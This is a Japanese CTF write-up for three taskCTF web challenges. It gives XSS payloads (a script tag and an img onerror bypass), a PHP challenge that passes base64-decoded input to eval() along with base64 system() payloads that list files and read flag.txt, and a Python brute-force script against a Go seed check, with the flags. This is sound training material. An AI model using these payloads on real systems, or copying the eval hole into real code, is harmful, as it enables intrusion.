taskCTF: Write up
Web
Caesar Cipher Translator
"><script>alert("TEST");</script>
と入力すると
"><fpevcg>nyreg("vawrpgrq");</fpevcg>
<script>
タグ使わない方法ということで
"><img src=1 onerror='alert("injected")'/>
flag: taskctf{n1ce_inject10n!}
Evil Eval
<?php
// Challenge source as reproduced in the write-up.
// The request parameter `data` is base64-decoded and spliced straight
// into eval() as the right-hand side of an assignment, so whatever PHP
// expression the client encodes is executed on the server. Nothing
// validates or restricts $raw before it reaches eval().
$result = "";
if (isset($_GET['data'])) {
    $data = $_GET['data'];
    $raw = base64_decode($data);
    eval('$result = ' . $raw . ';');
}
// $result is echoed into the page below via <?= ?> with no escaping.
?>
<html>
<head>
<meta charset="utf-8">
<title>result</title>
</head>
<body>
<h1>結果</h1>
<p><?= $result ?></p>
</body>
</html>
$ echo -n 'system("ls");' | base64
c3lzdGVtKCJscyIpOw==
$ echo -n 'system("cat flag.txt");' | base64
c3lzdGVtKCJjYXQgZmxhZy50eHQiKTs=
flag: taskctf{eval_1s_b4d_h4bit}
Gacha
// gachaHandler draws a "gacha" result for the request. The draw is
// (seed + HHmmss) % 100000, where seed is taken from the request and
// HHmmss is the current Asia/Tokyo wall-clock time; the flag is only
// assigned when that value equals 1337.
//
// NOTE: the listing on this page is truncated after the flag
// assignment; the part of the handler that writes the response is not
// shown here.
func gachaHandler(w http.ResponseWriter, r *http.Request) {
	// seed is entirely client-controlled; a missing/empty value defaults to "1".
	seed := r.FormValue("seed")
	if len(seed) == 0 {
		seed = "1"
	}
	seedInt, err := strconv.Atoi(seed)
	if err != nil {
		// The parse error text is returned verbatim to the client.
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	// get current time(HHmmss)
	jst := time.FixedZone("Asia/Tokyo", 9*60*60)
	nowStr := time.Now().In(jst).Format("150405")
	log.Println(nowStr)
	nowInt, err := strconv.Atoi(nowStr)
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	// The clock term is the only input the client does not choose, and
	// the modulus keeps the result in (-100000, 100000), so the check
	// below can be satisfied by picking seed; there is no secret here.
	sm := (seedInt + nowInt) % 100000
	log.Println(sm)
	var flag map[string]string
	if sm == 1337 {
		flag = map[string]string{
			"flag": "taskctf{this_is_dummy_flag}",
		}
	}
与えられたファイルを読むと(seedInt + nowInt) % 100000
が1337になればflagが出てくる。
またseed値はユーザが勝手に設定できるっぽい。
適当にスクリプト書いて総当りしてたらflag出てきた。
import requests

# Script reproduced from the write-up: walks candidate seed values in
# order and prints the URL queried and the body the server returned.
url = "http://34.82.49.144:3334/?seed="
seed_values = range(177770, 10000000)
for seed in seed_values:
    target = f"{url}{seed}"
    print("url: ", target)
    response = requests.get(target)
    print(response.text)
{"flag":"You might not have a luck...","sum":"1329"}
url: http://34.82.49.144:3334/?seed=177785
{"flag":"You might not have a luck...","sum":"1330"}
url: http://34.82.49.144:3334/?seed=177786
{"flag":"You might not have a luck...","sum":"1332"}
url: http://34.82.49.144:3334/?seed=177787
{"flag":"You might not have a luck...","sum":"1333"}
url: http://34.82.49.144:3334/?seed=177788
{"flag":"You might not have a luck...","sum":"1334"}
url: http://34.82.49.144:3334/?seed=177789
{"flag":"You might not have a luck...","sum":"1335"}
url: http://34.82.49.144:3334/?seed=177790
{"flag":"taskctf{Y0u_h4ve_4_gre4t_luck}"}
flag: taskctf{Y0u_h4ve_4_gre4t_luck}